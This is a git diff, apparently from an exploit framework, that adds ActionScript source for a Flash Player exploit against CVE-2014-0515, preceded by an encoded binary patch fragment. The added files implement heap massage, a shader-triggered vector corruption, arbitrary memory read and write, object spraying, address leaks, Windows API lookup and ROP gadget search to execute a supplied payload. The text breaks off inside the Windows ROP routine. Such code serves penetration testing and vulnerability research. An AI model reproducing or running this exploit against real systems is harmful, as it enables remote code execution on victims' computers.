z(-1;@v6KukNxKM?Q}3-}V&Cjoo99RSI**VICv3+foZKeeKTzUHtE|nfYZ$dH4ojCA
zC--PnUss{cNAOlmva~F7P^9Cbht~S#xtLsk^;2db*kF|Oa$sZvoQ|y4K0K%CdEFbn
z9Ed9qp4(uJ))lHG7ScN{y-fA@&+95Rm$FT*cqAO4hFSjTf>&BNne>qQvW3_ZIR)K@
z7``{U02sF}@r8dKIV>n%HY?6)aa_?dpwJXK-Y@Qy!@p>+?%>Foqd&60qoC&yi^>$k
z_FPF(vFE5b)e|U7y?r=45Z?L{9LOQu8FW09afD3(hdc9+D)=o3#UN@(5Mre|)?Q@W
zx)}=LNOks%lWG<#p;9~M5A`UKv1v6%R%7-m*U|6{M|ers63&E_Zg~KJ2s;j^3su_R
z6u921+K_3I10V!m0GgB@e|glVa7f`tl)+`0H8{}9c96yz+tk4DjPVhUCOf339d76O
z0+au8jUJhTF8p$+$h|bJz)n)#;q&3g>b&3AS$Sg$&Bbt(xH`x~I6Yl9Jji7j#60B>
z(n~6QAJn0Sfi|_Y*IADL_K55^tTi4wBe^5{i(6Ub9^MEJP;EgDIeCnbA8x6>x;(4i
zL^YfzKEbID!AT6*G<Ry`r0QiSmXb2`M(7FL+>9@1Go*WYTR-EQkz<I)(-#1q#zDIL
z5ZC3&S?e7yKWVLF_J$-m_SpeZ3x+qg36U?^1T<}g;f~$@d>C?syC`@wy8rNTSNT~v
zV-KxkZXw$B!OHKPOfiUF`A6QC?4*#zeGJuTLHMINkdN&W%%U7!l-ADE*mCBzRQ1>p
z^_bhg5WsZGWJ;$B1a!Nh+yFHG+IWZS64at$j>u#YaO20<ln1Y&_)i0BvjPDG<n*#3
z7tX-=mF>plpjr)_A-Qu?AOlZ(G&G6LEc_F>Bpu^}3Rj@sOi&IqG#VJJsc#JzSGnHB
zawFDNmV?M3vPV3y?ZckIsf#1pN%_t04&Y$euf3RX!@H_1QXF1AhuAzUvF5WPJu@#p
zC4R6JPB9+Luzfx~sMkfu;l3(eQ@F8Uj{n5CXg|enxnk<cV${N3?`|zPe7<+m`Uwxz
zO^)@LuF148q?no<ZE*RzH27GqaN=>X0W|pWQMNH3&)Hs`>5;avS19bIqFO~d^Z&qU
z!a2#wbo+I3qFvfF$6pIY2_f&-^MPLoi*n=s2vEE&mHss_7{z<=9#g-3!^}&)pXrFf
zTELaY=sP9SCh`I|orxBh%?3viV&mGBM!6+(GT>dcmH4S)vKBPg$FqktJAK%I6o#k$
zO<O9`XGeB8IWN9qC_7G67H5o!g+6cT=kv%ccsZdpLo9Q56gq4uD2n9qdF7<lI05ds
zvJ38e!Th&TZrtw-8WAtVXOoh9BO%YcM?xet;vuS>GKBV(4Y6PpA@aNvfS2C773^Cl
z#=eh$kZVqsONZ?TG|;eQD5Ck>_XXypi`Xe+!kZGI`9xb-S!p^OfFrKW%R{AB8k6Ur
zC|&3r5lTuq(okO7DH)hsQ=HCRQF530t<QqdO0GW^@7<!}ZCIhaBIEsxBC&d=FaYE8
z@rTOhDFN*&vHW-gOzta&h^OnqHB1k3pNiN8v1pc{*__r+lQQ=P1cP!VS!dFAs;-E<
z=|gLdu$RJS6M%1~@~Ig@6b%vCOznXCG)jY7Yb`)04j4d~)UtN{?C)ti6-yZssOscw
ze~LzZ+E*JQt|?bGsxG_o^x33wcKLzzauu#o$oyfZshsVF88@is(6SK<yX6Ex#R}Mt
zzD|Hi_zD+7Z+I@3YV}?5MOOF{6>e*ZhbW$#F*$!_fq)c57EA+;I7L)%$_DU~K;sOq
z0n}5qhbuB!w(IT$LjNp}=aj#WfgfAls3)&kE86SpK?iclYugplDBqLMYO>OO(0D40
z`9jlj>&;;fATRS$Ju0bPz`P+Co)obA6v(;1UrYJ!3eV+m)qzSq+eLlgpyF<d)-H?X
zzVhpbtD;#}6&!qm`^;4AMk=NU*-!#owze@;NlaNYg9}8_ZZ^ULcg`khK<adTo88yC
zCmY+qTuCFGzi9OJK(*d)zEiIpK=eOkZu2^=cB^k=C=rhd*n|N6-ITJTHxnRhFdYs<
zoOZj^tU+Olj~uvh-99DqA#=7hN<!(uh{AufRVqbXS$iEIPa<yG;4u_9L!&yH{}waS
z;k{VZR~`Ocj}DSFZA8@EbRmPKsx=7SPPW4_``<RmsnP0WlaYT!&!XL=NO(DIyodkt
zf&QEU==H-?A2k)w0(Zls``2lHH|I(Dz4%c*4%keNq>w&Qcbo5i8Xt3)*Ihdy-^$60
zcrtD*xg#(kjP6z0lNaRI;E^xx8*lk>5?ZcXQKFa28a1h$*FwN6nOquRNs$Z{IWpJ8
z4PLEVFfeh~|IsG`XsGM~CqGt4cQz$j$Y6HpPUZhYHuA$<VJJ&HhxKh96U{@F6}4Wd
zF1v+GN%^2TT{A^)v%(w$)-7ZwYa_konsdv3C_2t<Yh2h*^miI=xe#)lPK*_M<aH70
z)Tut_%QY6#4xgyaW7V1zhZ*29=vU2|ZsgoZO@EttkCd?X<$J}(>}TtUj2Y8+sFJOp
zxHBkK+Yd*Wl5+hfs3KEW#B)3%HG}pGeGAPOw)-o8*h<Yx>C8?hegg@w^5RYfk_SnX
zJ|E~XBiuS*fz|F}g}k4PC5(YKsJlOzQ$#><SJ+xp60~)f<ibPTOXngQ?DflJC)Gn8
z1<4o>D8=Kz+2+^TL2?U=dJqlJ(leKE+T*qX^(-SZ=Y?BgK|wp+2M#Z5f+F|ncE@If
z0X}gV2XTcsMR8PO(hj~#wZigdSM^35BG<BRqDIY08MRg0<i^%nIxDOOcoj@gN`tP?
z8DYstYS3hy<u?&Z3hW99PC<GFQO*w&%81t|gw>!dFS5wc4wEef!q*-dHwe|i0WBxd
ziiK^aqH@l;2*BrNgqZMU-*<hJ#w=@;%mx2;x!|Al^Ar(VRTFLi%K53ANlaw#AB}0*
zXTzRh<#?^+{p?%n3v;KFP2hM9Gpf&Zd3m%`z^OflXYN5E4O8d??nkv?0}^-@8(GbR
zQ`V&}Y4eGSKM*(LD$8jS^$RQ&X&YNNChcM4c~A6r98PhyCC^|MGPI{yJ_%hqtU7DP
zJD^SbbDa>hiso#P>ww$;AMhO%4jft5GPiQxy{Rn9{EpnlWEohZYO(rqkW`}W9JJF}
zkowBaj|i6Ap}|{p(rLw*sE9WfX_u}KAF4Mjz0A;%g*P;edRB8@uj0D^@1zx9Ka+<2
zjG57BfTYy;U~C0~V<emI5Bu5(N@UJuSRk5XfKM+%zDO@t3c14Ddw%3jGD4^&#AnQC
zzzx;63551+DQuV@PnrF|W2-O{#QYdhJC$J>SESH~TE^92wW*C+293k971{gFTlghv
zT4{JQp1k4rY&=4|>>PM7WG1bNGJ+NeDGLfHZm6`I-~*uhb$0J|;A=nPGcPxt<9bl{
z^MtuB*tza_SEGRRvMN<!zW~M*EQBr!r1h}#<{iop--Bk`prR4lAd{atVu@(wwM8;g
zf#s%3?9cyL)M}i)88Yk{AuN-KRU`zfEgW;J;OrY!?}AF$1~EuU=}V6ttL!VUARPm?
zhD+<p1swna2sqjO5N5B`CUj}g`Y4U~u`is0(p!&NV{~O?2CbcFA)?QDO;&5?EP`5U
zKj{$~N7nw~J7x*Rt^QBD!f~*^S04jB+QVe2^9Qmyc9PLcIWk(W(Gj4oC2$uExAaza
zx~6g|R}^fsru2EwWl4<4jcdN`aCqDPNzyNi`M8BxA%descJRa{ZCAoBxRJ~3)i0(r
z1Yn-FRy(b@0et}YFs1E^nFHNwL~T8Sp5$UXG%W%OIf2|48KtJA)rnL)4-oHKz1+C*
zm4`u^3zH`0dXKp*1O3Ak5;tG<VBx75SCVAv>bV9;zwD#Oy0%RWW?l~rb=hF^h7X1Z
z^p)dQa~k@=Iaxn~ME;f+<NA=4D9)Bj987(N0HcTuk>%IoV9##XKQ6E!#;D1U(f~JS
z1Uu|_l2xB2g`I1d52E*Fx)s^f)M!pB`h*Tgz2S<ICHmM@qpAj@1;Tg?@_EJ%I$6^r
z0$8coH%(X%U9T9|Nq?BeWsPOS+vJIDO3@LhDM8@b+VR!E^;N=ldx(m}vdyaBZMCqh
zcgO$>5m*B`SVRAeG8zHo1xu}f2#(m!fX9VfM&awZ^LqN7YFKfPunr+973)%RpW30V
zpp(}Tpt^Y{WAQBp>n=$j8qc|Eo$tC%_k-C`q+Yv@1w;o$K9@C+%NLYEu<M%$&<)W`
zP{&~@r^gTgx-(i&DdCEr41d=8A2-B2crqT?@Ok6#GYzyqp8#`3@p4oa4RlJkAW@~M
zQRs&k;PdmhWpz<@1_xGt?U6p_M|O%fqU$Y2OxBHwjv^nHcZUWq^al*vo>v~?0)*ag
zBf?C!Np0Zn?VSl+kuB-HS!M56+J)AVhC+=#EF^hc#2p2sG+j#!W*?H(Al~lI-nyRS
z>eo~$%kIE@u=pKV=SplY7f^j;JAo6)204NxvSPShrl#JivV`F>*Op1l+3qa-qv_Ns
zxw`L@EAkmKRu4^mmdBn)WTl9Z$^Qbo+Q{(edVoLY;|tePpRxj+=&088E2L}V)oye0
z;jjV}>H6l{XK|2581szYC5;E~+nKo;3D(?*#ZvGV0WF?DU9o?R{X#=$4s<>M3|p3H
z(xXJ<faZcPOZ?iLfnd3h^iu@CrC1Z*y35a8va@X4G+JX#cm5KpV`~L2vuM@sEyl7d
zUdn{B=Yh4CA(V`fnKMv0Y&0juZY~TtCg<?gIGg>o8Wb$g=}~t#7&QS1`gbs7DAk^k
zLK`{vBAM9x3{_hc!q|TiqR5RK98P?P_eX`fuag=eh9ye3nN_{JT$026=ZZ}e_;#2T
z;ECSq7I8kl1v++ZQ42%PA^lp*AeXhj0Od&iV5^qo;WW>?k>_fsz8J}Zy!{`eZ7)rm
zAfU|gMO&Ne#rkDau*x1NNuNWSk~YLTsqASO)4xVpRZHZO=(Th2tMt^HlWPlcUB=Lg
zMBBi`B3oO;+5qT5<-l`LVhIgoLBe94z!Y?;8?ZMzg3ni!2peo$XFcP293&WE)g9Q|
zVRBkro3^Z%b30_Xc<mjD*^vN>j_3`mq~`dyT)-hg&2^lET30Z94%u3HBce^UPd`S~
zzzk=j^ta^B#39-^azyjlo)ckX&Gz#jv0x|5Oa_XOj|NlML`<CV4^;Fn)CeCkVt(Fe
zuFCjSEX^6o!48U`2opNBO?yg!@!RZoATw6*RFG@PpvYDO|5uLdrarAh(nG`@@GVFd
z>X%lC@>fOj4aKA$lSe0}>&Ib1c^R0r^YBbFHX0AfC;0z=_JS&^b_V#bO0$uJ*kJ9i
z-SND^9-lfkh!=4e%s{d!6GB}HaU*TvP%i!z_XXchn{SYWgPK+LRPlvC(#A_^Y!D@P
zapxCywPCMp$#FO{NIkFLm6!qyXs|*SEw9xK!`kkHo0;KgLyi-m5!jAg_C#fw2@<qF
zzEw{M>zoxmQ%fAV(rOvPXSL-yEb{H4@;v7LQ<W-m@Bg0q50p6)OkarTF9l#pSaXqI
zk6Hbxu0rH6zvj;JfU(bi-M73my-G2(s3q-Q6WxbBH1KENU9V!GQY3PNusTy4o6nm(
zV|q9zHoqSAK+&QvE&1V4eh%Xj9XA=#5r`)#B;lA^!E6oA;}i~WD2ZZ`qY}UT+Kbr4
wL;F75X9M6W-Yle6Orkv}xXS6z*%ZK$i#1n)m?t12B`4<kaP>;0|Nef!!y#|G`~Uy|

literal 0
HcmV?d00001

diff --git a/external/source/exploits/CVE-2014-0515/Elf.as b/external/source/exploits/CVE-2014-0515/Elf.as
new file mode 100644
index 0000000000..ee7283c61c
--- /dev/null
+++ b/external/source/exploits/CVE-2014-0515/Elf.as
@@ -0,0 +1,235 @@
+package
+{
+    public class Elf
+    {
+        private const PT_DYNAMIC:uint = 2
+        private const PT_LOAD:uint = 1 
+        private const PT_READ_EXEC:uint = 5
+        private const DT_SYMTAB:uint = 6
+        private const DT_STRTAB:uint = 5
+        private const DT_PLTGOT:uint = 3
+
+        private var e_ba:ExploitByteArray
+        // elf base address
+        public var base:uint = 0
+        // program header address
+        public var ph:uint = 0
+        // number of program headers
+        public var ph_size:uint = 0
+        // program header entry size
+        public var ph_esize:uint = 0
+        // DYNAMIC segment address
+        public var seg_dynamic:uint = 0
+        // DYNAMIC segment size
+        public var seg_dynamic_size:uint = 0
+        // CODE segment address
+        public var seg_exec:uint = 0
+        // CODE segment size
+        public var seg_exec_size:uint = 0
+        // .dynsyn section address
+        public var sec_dynsym:uint = 0
+        // .synstr section address
+        public var sec_dynstr:uint = 0
+        // .got.plt section address
+        public var sec_got_plt:uint = 0
+         
+        public function Elf(ba:ExploitByteArray, addr:uint) 
+        {
+            e_ba = ba
+            set_base(addr)
+            set_program_header()
+            set_program_header_size()
+            set_program_header_entry_size()
+            set_dynamic_segment()
+            set_exec_segment()
+            set_dynsym()
+            set_dynstr()
+            set_got_plt()
+        }
+
+        public function external_symbol(name:String):uint {
+            var entry:uint = 0
+            var st_name:uint = 0
+            var st_value:uint = 0
+            var st_size:uint = 0
+            var st_info:uint = 0
+            var st_other:uint = 0
+            var st_shndx:uint = 0
+            var st_string:String = ""
+            var got_plt_index:uint = 0
+
+            for(var i:uint = 0; i < 1000; i++) { // 1000 is just a limit
+                entry = sec_dynsym + 0x10 + (i * 0x10)
+                st_name = e_ba.read(entry)
+                st_value = e_ba.read(entry + 4)
+                st_info = e_ba.read(entry + 0xc, "byte")
+                st_string = e_ba.read_string(sec_dynstr + st_name)
+                if (st_string == name) {
+                    return e_ba.read(sec_got_plt + 0xc + (got_plt_index * 4))
+                }
+                if (st_info != 0x11) {
+                    got_plt_index++
+                }
+            }
+            throw new Error()  
+        }
+
+        public function symbol(name:String):uint {           
+            var entry:uint = 0
+            var st_name:uint = 0
+            var st_value:uint = 0
+            var st_size:uint = 0
+            var st_info:uint = 0
+            var st_other:uint = 0
+            var st_shndx:uint = 0
+            var st_string:String = ""
+
+            for(var i:uint = 0; i < 3000; i++) { // 3000 is just a limit
+                entry = sec_dynsym + 0x10 + (i * 0x10)
+                st_name = e_ba.read(entry)
+                st_value = e_ba.read(entry + 4)
+                st_info = e_ba.read(entry + 0xc, "byte")
+                st_string = e_ba.read_string(sec_dynstr + st_name)
+                if (st_string == name) {
+                    return base + st_value
+                }
+            }
+            throw new Error()  
+        }
+
+
+        public function gadget(gadget:String, hint:uint):uint
+        {
+            var value:uint = parseInt(gadget, 16)
+            var contents:uint = 0
+            for (var i:uint = 0; i < seg_exec_size - 4; i++) {
+                contents = e_ba.read(seg_exec + i)
+                if (hint == 0xffffffff && value == contents) {
+                    return seg_exec + i
+                } 
+                if (hint != 0xffffffff && value == (contents & hint)) { 
+                    return seg_exec + i
+                }
+            }
+            throw new Error()
+        } 
+ 
+        private function set_base(addr:uint):void
+        {
+            addr &= 0xffff0000
+            while (true) {
+                if (e_ba.read(addr) == 0x464c457f) {
+                    base = addr
+                    return
+                }
+                addr -= 0x1000
+            }
+            
+            throw new Error()
+        }  
+ 
+        private function set_program_header():void
+        {
+            ph = base + e_ba.read(base + 0x1c)
+        }
+    
+        private function set_program_header_size():void
+        {
+            ph_size = e_ba.read(base + 0x2c, "word")
+        } 
+
+        private function set_program_header_entry_size():void
+        {
+            ph_esize = e_ba.read(base + 0x2a, "word")
+        }
+    
+        private function set_dynamic_segment():void
+        {
+            var entry:uint = 0
+            var p_type:uint = 0
+
+            for (var i:uint = 0; i < ph_size; i++) {
+                entry = ph + (i * ph_esize)
+                p_type = e_ba.read(entry)
+                if (p_type == PT_DYNAMIC) {
+                    seg_dynamic = base + e_ba.read(entry + 8)
+                    seg_dynamic_size = e_ba.read(entry + 0x14)
+                    return
+                }
+            }
+
+            throw new Error()
+        }
+
+        private function set_exec_segment():void
+        {
+            var entry:uint = 0
+            var p_type:uint = 0
+            var p_flags:uint = 0
+            
+            for (var i:uint = 0; i < ph_size; i++) {
+                entry = ph + (i * ph_esize)
+                p_type = e_ba.read(entry)
+                p_flags = e_ba.read(entry + 0x18)
+                if (p_type == PT_LOAD && (p_flags & PT_READ_EXEC) == PT_READ_EXEC) {
+                    seg_exec = base + e_ba.read(entry + 8)
+                    seg_exec_size = e_ba.read(entry + 0x14)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+ 
+        private function set_dynsym():void
+        {
+            var entry:uint = 0
+            var s_type:uint = 0
+
+            for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
+                entry = seg_dynamic + i
+                s_type = e_ba.read(entry)
+                if (s_type == DT_SYMTAB) {
+                    sec_dynsym = e_ba.read(entry + 4)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+
+        private function set_dynstr():void
+        {
+            var entry:uint = 0
+            var s_type:uint = 0
+
+            for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
+                entry = seg_dynamic + i
+                s_type = e_ba.read(entry)
+                if (s_type == DT_STRTAB) {
+                    sec_dynstr = e_ba.read(entry + 4)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+
+        private function set_got_plt():void
+        {
+            var entry:uint = 0
+            var s_type:uint = 0
+
+            for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
+                entry = seg_dynamic + i
+                s_type = e_ba.read(entry)
+                if (s_type == DT_PLTGOT) {
+                    sec_got_plt = e_ba.read(entry + 4)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+    }
+}
diff --git a/external/source/exploits/CVE-2014-0515/Exploit.as b/external/source/exploits/CVE-2014-0515/Exploit.as
new file mode 100755
index 0000000000..7270d46963
--- /dev/null
+++ b/external/source/exploits/CVE-2014-0515/Exploit.as
@@ -0,0 +1,140 @@
+//compile with AIR SDK 13.0: mxmlc Exploit.as -o Exploit.swf
+package {
+	import flash.display.Sprite
+	import flash.utils.ByteArray
+	import flash.display.Shader
+	import flash.system.Capabilities
+	import flash.utils.Endian
+	import __AS3__.vec.Vector
+	import __AS3__.vec.*
+	import flash.display.LoaderInfo
+    import mx.utils.Base64Decoder
+	
+	public class Exploit extends Sprite {
+		
+		protected var Shad:Class
+		private var uv:Vector.<uint>
+        private var b64:Base64Decoder = new Base64Decoder()
+        private var payload:ByteArray
+        private var platform:String
+        private var os:String
+    	private var exploiter:Exploiter
+		
+		public function Exploit(){
+            platform = LoaderInfo(this.root.loaderInfo).parameters.pl
+            os = LoaderInfo(this.root.loaderInfo).parameters.os
+            var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
+            var pattern:RegExp = / /g;
+            b64_payload = b64_payload.replace(pattern, "+")
+            b64.decode(b64_payload)
+            payload = b64.toByteArray()
+            
+            var shader:Shader
+            if (platform == "linux") {
+                this.Shad = GraphShadLinux
+            } else {
+                this.Shad = GraphShadWindows
+            }
+                        
+			super()
+			var i:* = 0
+			var j:* = 0
+			var offset:int = -1
+			var corrupted_vector_idx:int = -1
+            						
+			// Memory massage
+			Logger.log("Memory massage")
+			var array_length:uint = 0x10000
+			var vector_size:uint = 34
+			var array:Array = new Array()
+
+			i = 0
+			while (i < array_length)
+			{
+				array[i] = new Vector.<uint>(vector_size)
+				i++;
+			}
+			
+			i = 0
+			while (i < array_length)
+			{
+				array[i].length = 0
+				i++
+			}
+			
+			i = 0x0200
+			while (i < array_length)
+			{
+				array[(i - (2 * (j % 2)))].length = 0x0100
+				array[(i - (2 * (j % 2)))][0] = 0xdeedbeef
+				array[(i - (2 * (j % 2)))][1] = 0xdeadbeef
+				array[(i - (2 * (j % 2)))][2] = (i - (2 * (j % 2)))
+				i = (i + 28)
+				j++
+			}
+			
+			// Overflow and Search for corrupted vector
+			Logger.log("Overflow and Search for corrupted vector")
+			var shadba:ByteArray = (new this.Shad() as ByteArray)
+			shadba.position = 232
+			if (Capabilities.os.indexOf("Windows 8") >= 0)
+			{
+				shadba.writeUnsignedInt(2472)
+			}
+			shadba.position = 0
+
+			Logger.log("corrupting")
+			
+			shader = new Shader()
+			try
+			{
+				shader.byteCode = (new this.Shad() as ByteArray);
+			} catch(e) { }
+			
+			i = 0
+			while (i < array_length)
+			{
+				if (array[i].length > 0x0100)
+				{
+					corrupted_vector_idx = i
+					break
+				}
+				i++
+			}
+			
+			if (corrupted_vector_idx == -1) {
+				Logger.log("Exploit - Corrupted vector not found.")
+				return
+			}
+			
+			for(i = 0; i < array[corrupted_vector_idx].length; i++) {
+				if (array[corrupted_vector_idx][i] == 0x0100 && array[corrupted_vector_idx][i + 2] == 0xdeedbeef) {
+					Logger.log("w00t!, found, corrupting ")
+					array[corrupted_vector_idx][i] = 0xffffffff
+					offset = i
+					break
+				}
+			}
+			
+			if (offset == -1) {
+				Logger.log("Exploit - Secondary vector not corrupted")
+				return
+			}
+
+
+			for(i = 0; i < array.length; i++) {
+				if (array[i].length == 0xffffffff) {
+					Logger.log("super corrupted found")
+					uv = array[i]
+					Logger.log("corrupted vector before fixing : " + array[corrupted_vector_idx].length.toString())
+					uv[0x3ffffffc - offset] = 34
+					Logger.log("corrupted vector before fixing : " + array[corrupted_vector_idx].length.toString())
+				}
+			}
+			Logger.log('done? Exploiting!')
+            exploiter = new Exploiter(this, platform, os, payload, uv)
+//			uv[0x3ffffffe] = 0x100
+//			Logger.log(uv.length.toString())
+		}
+	}
+}//package 
diff --git a/external/source/exploits/CVE-2014-0515/ExploitByteArray.as b/external/source/exploits/CVE-2014-0515/ExploitByteArray.as
new file mode 100644
index 0000000000..a8da46df7b
--- /dev/null
+++ b/external/source/exploits/CVE-2014-0515/ExploitByteArray.as
@@ -0,0 +1,85 @@
+package
+{
+    import flash.utils.ByteArray
+    
+    public class ExploitByteArray
+    {
+        private const MAX_STRING_LENGTH:uint = 100
+        public var ba:ByteArray
+        public var original_length:uint
+        private var platform:String
+
+        public function ExploitByteArray(p:String, l:uint = 1024)
+        {
+            ba = new ByteArray()
+            ba.length = l
+            ba.endian = "littleEndian"
+            ba.writeUnsignedInt(0)
+            platform = p
+            original_length = l
+        }
+
+        public function set_length(length:uint):void
+        {
+            ba.length = length
+        }
+
+        public function get_length():uint
+        {
+            return ba.length
+        }
+
+        public function lets_ready():void
+        {
+            ba.endian = "littleEndian"
+            if (platform == "linux") {
+                ba.length = 0xffffffff
+            } 
+        }
+
+        public function is_ready():Boolean
+        {
+            if (ba.length == 0xffffffff)
+                return true
+
+            return false
+        }
+
+        public function read(addr:uint, type:String = "dword"):uint
+        {
+            ba.position = addr
+            switch(type) {
+                case "dword": 
+                    return ba.readUnsignedInt()
+                case "word":
+                    return ba.readUnsignedShort()
+                case "byte":
+                    return ba.readUnsignedByte()
+            }
+            return 0
+        }
+
+        public function read_string(addr:uint, length:uint = 0):String
+        {
+            ba.position = addr
+            if (length == 0)
+                return ba.readUTFBytes(MAX_STRING_LENGTH)
+            else
+                return ba.readUTFBytes(length) 
+        }
+
+        public function write(addr:uint, value:* = 0, zero:Boolean = true):void
+        {
+            var i:uint
+
+            if (addr) ba.position = addr
+            if (value is String) {
+                for (i = 0; i < value.length; i++) ba.writeByte(value.charCodeAt(i))
+                if (zero) ba.writeByte(0)
+            } else if (value is ByteArray) {
+                var value_length:uint = value.length
+                for (i = 0; i < value_length; i++) ba.writeByte(value.readByte())
+            } else ba.writeUnsignedInt(value)
+        }
+    }
+}
diff --git a/external/source/exploits/CVE-2014-0515/ExploitVector.as b/external/source/exploits/CVE-2014-0515/ExploitVector.as
new file mode 100644
index 0000000000..d0283d803e
--- /dev/null
+++ b/external/source/exploits/CVE-2014-0515/ExploitVector.as
@@ -0,0 +1,74 @@
+package
+{
+    public class ExploitVector
+    {
+        private var uv:Vector.<uint>
+        public var original_length:uint = 0x100 
+        
+        public function ExploitVector(v:Vector.<uint>)
+        {
+            uv = v
+        }
+
+        public function restore():void
+        {
+            uv[0x3ffffffe] = original_length
+        }
+
+        public function is_ready():Boolean
+        {
+            if (uv.length > original_length) 
+            {
+                return true
+            }
+            return false
+        } 
+        
+        public function at(pos:uint):uint
+        {
+            return uv[pos]
+        }
+
+        // pos: position where a Vector.<Object>[0] lives
+        public function set_own_address(pos:uint):void
+        {
+            uv[0] = uv[pos - 5] - ((pos - 5) * 4) - 0xc
+        }
+
+        public function read(addr:uint):uint
+        {
+            var pos:uint = 0
+
+            if (addr > uv[0]) {
+                pos = ((addr - uv[0]) / 4) - 2
+            } else {
+                pos = ((0xffffffff - (uv[0] - addr)) / 4) - 1
+            }
+
+            return uv[pos]
+        }
+
+        public function write(addr:uint, value:uint = 0):void
+        {           
+            var pos:uint = 0
+
+            if (addr > uv[0]) {
+                pos = ((addr - uv[0]) / 4) - 2
+            } else {
+                pos = ((0xffffffff - (uv[0] - addr)) / 4) - 1
+            }
+
+            uv[pos] = value
+        }
+
+        public function search_pattern(pattern:uint, limit:uint):uint
+        {
+            for (var i:uint = 0; i < limit/4; i++) {
+                if (uv[i] == pattern) {
+                    return i
+                }
+            }
+            throw new Error() 
+        }
+    }
+}
diff --git a/external/source/exploits/CVE-2014-0515/Exploiter.as b/external/source/exploits/CVE-2014-0515/Exploiter.as
new file mode 100644
index 0000000000..0a971409f6
--- /dev/null
+++ b/external/source/exploits/CVE-2014-0515/Exploiter.as
@@ -0,0 +1,399 @@
+package
+{ 
+    import flash.utils.ByteArray
+    import flash.system.System
+
+    public class Exploiter
+    {
+        private const VECTOR_OBJECTS_LENGTH:uint = 1014
+        private var exploit:Exploit
+        private var ev:ExploitVector
+        private var eba:ExploitByteArray
+        private var payload:ByteArray
+        private var platform:String
+        private var op_system:String
+        private var pos:uint
+        private var byte_array_object:uint
+        private var main:uint
+        private var stack_object:uint
+        private var payload_space_object:uint
+        private var buffer_object:uint
+        private var buffer:uint
+        private var vtable:uint
+        private var stack_address:uint
+        private var payload_address:uint 
+        private var stack:Vector.<uint> = new Vector.<uint>(0x6400)
+        private var payload_space:Vector.<uint> = new Vector.<uint>(0x6400) 
+        private var spray:Vector.<Object> = new Vector.<Object>(90000)
+
+        public function Exploiter(exp:Exploit, pl:String, os:String, p:ByteArray, uv:Vector.<uint>):void
+        {
+            exploit = exp
+            payload = p
+            platform = pl
+            op_system = os
+
+            ev = new ExploitVector(uv)
+            if (!ev.is_ready()) return
+            eba = new ExploitByteArray(platform)
+            spray_objects()
+            try { pos = search_objects() } catch (err:Error) { ev.restore(); cleanup(); return; }
+            ev.set_own_address(pos)
+            if (!disclose_objects()) { ev.restore(); cleanup(); return; }
+            disclose_addresses()
+            corrupt_byte_array()
+            if (!eba.is_ready()) { ev.restore(); cleanup(); return }
+            do_rop()
+            restore_byte_array()
+            ev.restore()
+            cleanup()
+        }
+
+        private function spray_objects():void
+        {
+            Logger.log("[*] Exploiter - spray_objects()")
+            for (var i:uint = 0; i < spray.length; i++) 
+            {
+				spray[i] = new Vector.<Object>(VECTOR_OBJECTS_LENGTH)
+				spray[i][0] = eba.ba
+				spray[i][1] = exploit 
+				spray[i][2] = stack
+				spray[i][3] = payload_space
+            } 
+        }
+        
+        private function search_objects():uint
+        {
+            Logger.log("[*] Exploiter - search_objects()")
+            var idx:uint = ev.search_pattern(VECTOR_OBJECTS_LENGTH, 0xac100)
+            return idx + 1
+        }
+
+        private function disclose_objects():Boolean
+        { 
+            Logger.log("[*] Exploiter - disclose_objects()")
+            byte_array_object = ev.at(pos) - 1
+            main = ev.at(pos + 1) - 1
+            stack_object = ev.at(pos + 2) - 1
+            payload_space_object = ev.at(pos + 3) - 1
+            if (byte_array_object < 0x1000 || main < 0x1000 || stack_object < 0x1000 || payload_space_object < 0x1000) {
+                return false
+            }
+            return true
+        }
+
+        private function disclose_addresses():void
+        {
+            Logger.log("[*] Exploiter - disclose_addresses()")
+            if (platform == "linux") 
+            {
+                buffer_object = ev.read(byte_array_object + 0x10)
+                buffer = ev.read(buffer_object + 0x1c)
+            }    
+            else if (platform == "win") 
+            {
+                buffer_object = ev.read(byte_array_object + 0x40)
+                buffer = ev.read(buffer_object + 8)
+            }
+            vtable = ev.read(main)
+            stack_address = ev.read(stack_object + 0x18)
+            payload_address = ev.read(payload_space_object + 0x18)
+        }
+        
+        private function corrupt_byte_array():void
+        {
+            Logger.log("[*] Exploiter - corrupt_byte_array(): " + platform)
+            if (platform == "linux")
+            {
+                ev.write(buffer_object + 0x1c) // *array
+                ev.write(buffer_object + 0x20, 0xffffffff) // capacity
+            } 
+            else if (platform == "win")
+            {
+                ev.write(buffer_object + 8) // *array
+                ev.write(buffer_object + 16, 0xffffffff) // capacity
+            }
+            eba.lets_ready()
+        }
+
+        private function restore_byte_array():void
+        { 
+            Logger.log("[*] Exploiter - restore_byte_array(): " + platform)
+            if (platform == "linux")
+            {
+                ev.write(buffer_object + 0x1c, buffer) // *array
+                ev.write(buffer_object + 0x20, 1024) // capacity
+            } 
+            else if (platform == "win")
+            {
+                ev.write(buffer_object + 8, buffer) // *array
+                ev.write(buffer_object + 16, 1024) // capacity
+            }
+            eba.set_length(eba.original_length) 
+        }
+        
+        private function do_rop():void
+        {
+            Logger.log("[*] Exploiter - do_rop()")
+            if (platform == "linux") {
+                do_rop_linux()
+            } else if (platform == "win") {
+                if (op_system == "Windows 8.1") {
+                    do_rop_windows8()
+                } else if (op_system == "Windows 7") {
+                    do_rop_windows()
+                } else {
+                    return
+                }
+            } else {
+                return
+            }
+        }
+
+        private function do_rop_windows():void
+        {
+            Logger.log("[*] Exploiter - do_rop_windows()")
+            var pe:PE = new PE(eba)
+            var flash:uint = pe.base(vtable)
+            var winmm:uint = pe.module("winmm.dll", flash)
+            var kernel32:uint = pe.module("kernel32.dll", winmm)            
+            var ntdll:uint = pe.module("ntdll.dll", kernel32)
+            var virtualprotect:uint = pe.procedure("VirtualProtect", kernel32)
+            var virtualalloc:uint = pe.procedure("VirtualAlloc", kernel32)
+            var createthread:uint = pe.procedure("CreateThread", kernel32)
+            var memcpy:uint = pe.procedure("memcpy", ntdll)
+            var xchgeaxespret:uint = pe.gadget("c394", 0x0000ffff, flash)
+            var xchgeaxesiret:uint = pe.gadget("c396", 0x0000ffff, flash)
